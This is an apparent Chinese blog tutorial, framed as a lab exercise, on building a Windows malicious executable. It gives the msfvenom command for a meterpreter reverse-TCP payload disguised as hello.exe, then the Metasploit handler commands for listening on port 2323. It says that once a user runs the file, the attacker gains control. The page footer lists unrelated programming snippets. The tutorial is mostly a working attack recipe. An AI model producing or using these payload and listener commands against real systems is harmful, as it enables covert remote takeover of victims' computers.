首页 > 系统相关 >第二节 制作获取shell

第二节 制作获取shell

时间:2023-10-15 15:11:18浏览次数:50  
标签:exe set xxx 获取 shell 设置 第二节 制作

//实验内容:制作Windows恶意软件获取shell
//Msfvenom的shell在Windows中使用的msfvenom生成shell.exe
//制作恶意shell
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.5 lport=2323 -f exe > hello.exe

 

//启动metaspliot
msfconsole

 

//设置侦听
//加载模块
use exploit/multi/handler 
//设置攻击载荷
set payload windows/meterpreter/reverse_tcp
//设置kali的IP
set lhost xxx.xxx.xxx.xxx
//设置kali的端口
set lport 2323
//开始等待用户运行文件
run

 

//将生成的shell文件复制到靶机中

//当用户运行hello.exe文件后,我们就拥有了控制权

 

标签:exe,set,xxx,获取,shell,设置,第二节,制作
From: https://www.cnblogs.com/feigg/p/17765651.html

相关文章

  • C#之获取本机盘符
        ///<summary>    ///窗体加载    ///</summary>    ///<paramname="sender"></param>    ///<paramname="e"></param>    privatevoidInvoiceDownload_Load(objectsender,EventA......
  • vue js获取当天日期
    <template><div><p>Todayis{{today}}</p></div></template><script>exportdefault{data(){return{today:''}},mounted(){this.today=this.getCurrentDate();......
  • C# 控制台应用中获取屏幕分辨率
    引用System.Management安装包。usingSystem.Management;ManagementObjectSearchermydisplayResolution=newManagementObjectSearcher("SELECTCurrentHorizontalResolution,CurrentVerticalResolutionFROMWin32_VideoController");foreach(ManagementObject......
  • linux shell终端中实现数值计算
     001、方法1expr[root@pc1test]#expr50+4090  002、方法2bc[root@pc1test]#echo50+40|bc90 003、方法3 awk[root@pc1test]#awk'BEGIN{print50+40}'90 004、方法4 (())[root@pc1test]#echo$((50+40))90[root@pc1test]#......
  • linux shell中创建函数
     001、[root@pc1test]#cattest.sh##函数脚本#!/bin/bashfunctiondb1##function关键字来定义函数,db1是函数名{read-p"请输入:"valuereturn$[$value*2]##return返回函数值}db1#......
  • 【精品】使用druid 获取数据库表的信息
    Maven依赖<dependency><groupId>org.projectlombok</groupId><artifactId>lombok</artifactId></dependency><dependency><groupId>com.mysql</groupId><artifactId>mysql-connector-j</artifac......
  • Shell脚本实现类Windows回收站
    Shell脚本实现类Windows回收站目录drm伪命令2参数2示例2命令安装3脚本说明3脚本安装3执行bashinstall.sh安装4再次执行bashinstall.sh进行对drm操作4命令使用5查看帮助信息5将文件放入回收站5创建测试文件5指定自动清理的时间和过程5删除文件5删除多个文件和目录6......
  • jsoup获取指定class名称的标签
      publicvoidloadHtmlFile(StringhtmlFilePath){try{Documentdoc=Jsoup.parse(newFile(htmlFilePath),"utf-8");Elementsdivs=doc.select("div.hop1");for(Elementdiv:divs){......
  • How to use Linux shell script to create a command line interactive menu window i
    HowtouseLinuxshellscripttocreateacommandlineinteractivemenuwindowinterfaceAllInOne如何使用Linuxshellscript制作一个命令行交互式菜单窗口界面AllInOneQ:如何实现一个类似raspi-config的交互式命令行菜单功能raspi-configistheRaspberr......
  • Ubuntu下安装使用Powershell
    微软推出新的管理命令行工具WindowsPowershell,它是基于.net的工具,所有的管理对象都是按照.net对象来进行管理的,对使用过.net的开发人员来说就更方便了。从Powershell6.0开始,微软就将其重命名为powershell了,体现了其跨平台性,其实微软推出Powershell的时候就是把其定位为一款跨平台......